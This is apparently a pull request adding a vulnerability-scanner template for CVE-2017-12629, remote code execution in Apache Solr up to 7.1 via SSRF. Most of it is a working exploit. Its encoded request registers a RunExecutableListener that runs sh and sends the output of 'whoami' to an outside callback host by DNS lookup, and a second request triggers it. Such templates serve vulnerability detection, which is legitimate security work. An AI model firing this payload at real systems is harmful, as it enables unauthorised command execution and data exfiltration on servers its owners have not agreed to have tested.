### PR TITLE
Add CVE-2017-12629

### DIFF
--- a/cves/CVE-2017-12629.yaml
+++ b/cves/CVE-2017-12629.yaml
@@ -1,0 +1,32 @@
+id: CVE-2017-12629
+
+info:
+  name: Apache Solr <= 7.1 Remote Code Execution via SSRF
+  author: dwisiswant0
+  severity: critical
+
+  # This template will exploit the SSRF to obtain RCE in Apache Solr/Lucene
+  # prior to version 7.1, because using XXE may not necessarily work. See references[2].
+  # --
+  # References:
+  # - [1] https://nvd.nist.gov/vuln/detail/CVE-2017-12629
+  # - [2] https://twitter.com/honoki/status/1298636315613974532/photo/1
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.burpcollabolator.net%22%5D%7D%7D&wt=json&isShard=true&q=apple"
+      - "{{BaseURL}}/solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "responseHeader"
+        part: body
+      - type: word
+        words:
+          - "text/plain"
+        part: header
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## Apache Solr <= 7.1 Remote Code Execution via SSRF

  This template will exploit the SSRF to obtain RCE in Apache Solr/Lucene
  prior to version 7.1, because using XXE may not necessarily work. See references[2].

  References:
  - [1] https://nvd.nist.gov/vuln/detail/CVE-2017-12629
  - [2] https://twitter.com/honoki/status/1298636315613974532/photo/1